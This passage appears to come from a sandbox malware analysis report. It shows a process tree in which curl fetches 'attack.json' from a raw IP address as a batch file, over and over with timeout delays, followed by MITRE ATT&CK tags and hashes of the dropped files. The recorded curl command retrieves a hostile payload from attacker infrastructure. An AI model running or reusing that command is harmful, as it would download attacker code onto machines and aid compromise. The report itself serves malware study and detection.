- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4752
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4940
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2032
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:536
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:724
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:228
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:2056
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4000
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2276
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4572
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4736
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3744
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:400
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1304
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:464
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:964
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4988
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3664
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:4056
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1628
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:548
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3176
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2616
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3616
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1196
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2368
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4480
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:5108
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:2400
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1824
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3684
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4604
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:864
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1344
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:624
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4524
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:3172
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1588
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:2348
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3120
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1728
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2916
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4016
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2420
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:5028
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4600
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:3160
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:512
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4216
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2220
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:4816
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:220
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4504
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2508
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:4620
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3140
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3968
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:424
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4868
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1580
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:4896
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3372
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:4640
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:5052
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4452
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4064
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2776
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4948
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3276
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1756
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:5060
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:740
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4536
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3416
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4808
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3088
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4388
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4080
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3304
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2296
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:5024
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4424
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1880
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3800
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1384
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4352
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4608
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:680
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:4664
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2104
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4372
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:232
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:836
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2136
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2972
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3920
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4492
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4996
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3624
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4804
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:2660
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3480
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:640
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1964
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4332
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2244
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:452
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2276
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1748
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1584
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2708
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:5076
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4552
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3508
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4724
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3168
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2324
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4248
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1628
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4208
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2172
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2976
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1896
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:548
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:316
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3232
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3700
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2784
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:5072
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2368
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4076
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:364
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1440
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1824
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2120
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3484
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4220
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3476
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2180
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3048
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:748
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1596
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4420
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1412
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4324
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3564
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:460
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4100
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2788
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4164
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3288
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4960
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:2316
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1760
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:4556
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2536
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:4504
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2508
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4620
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3140
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4040
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:768
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:5004
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2924
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3000
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4528
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1884
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3808
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3184
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3928
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:2688
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4948
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3276
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1756
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:5060
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1396
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4536
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3416
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4808
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3088
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:3996
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4612
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3304
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2296
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:5024
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1816
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1880
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3800
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1384
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:180
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4260
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3324
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:680
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3688
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4580
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2104
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4372
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:704
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:836
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2136
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1708
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1892
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:4728
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1600
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3080
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4052
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:1296
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1472
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:724
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3940
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2856
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4000
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3060
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4572
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4316
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2412
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4924
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4592
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:400
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1496
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2472
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2456
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2324
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3992
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1628
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4208
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2172
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1120
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:3016
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:548
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:2616
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:4416
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:1196
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2784
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:5072
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:2428
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4076
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1340
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:1440
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:1404
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:2120
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3484
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  PID:4220
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:552
- C:\Windows\system32\timeout.exe
  Timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:3048
- C:\Windows\system32\curl.exe
  curl -s -o iAYY.bat http://185.254.97.190:3000/download/attack.json
  2⤵
  PID:3412

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Network Service Discovery

T1046

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\hjUZ\iAYY.bat

Filesize
104B

MD5
bc74c8ef709bdc5e9bcc8529c1b3b167

SHA1
961d384576b4b19e88fedc258158141dbf40de0e

SHA256
badd8ce986a47142f088611c3311bb672f207867644e81f5d9d327f50ded7f7e

SHA512
4d16f8a1d897e5d6f122a64afcbebcd750e9bb2f4b04efcfc70a739f7e2ce675c89357a1ba6572b1d902cbd995b0d7ae04c2524b28bc8462d3df431cb8bba001

Download Submit
C:\Users\Admin\AppData\Roaming\hjUZ\iAYY.bat

Filesize
95B

MD5
c190c396ccb6728528ca48b0e47edd13

SHA1
7cb793cc0e0e2d2b59c70f6fd2e2b9b18a9f066d

SHA256
a208e1955e12d93e05f2fefd23d98724af553e8a6c8cc114754493e7d3ec0d14

SHA512
01f2938c808945d0220e896db2ae98c55060be88303ddbb037078249c9f9798683abe57784f501c509e30ff50328962fa34573d370b57755cee9ede989c9787f

Download Submit
C:\Users\Admin\AppData\Roaming\hjUZ\iAYY.bat

Filesize
95B

MD5
b1a2450a95b826b0ca6a6f792108b4e0

SHA1
082c514627ebc02fd6e0d91dbb0e1ae07abdddb3

SHA256
5de0d41be887e41c6facc4216317ce5674d33b47c4243b15856a620085e319b8

SHA512
af172192e7c0bd4d3fefef0dffe5045d03e689211c8c73a38e3ae870d6ac8749ee64713fe1553df653e5ec868f98b1cb729dacaa1d864b680802cbdaf2f568f4

Download Submit
C:\Users\Admin\AppData\Roaming\hjUZ\iAYY.bat

Filesize
102B

MD5
b410b082dd9f93c47842f7704a44928b

SHA1
0dffc6a17d717aab1174d941300a32837ee240cb

SHA256
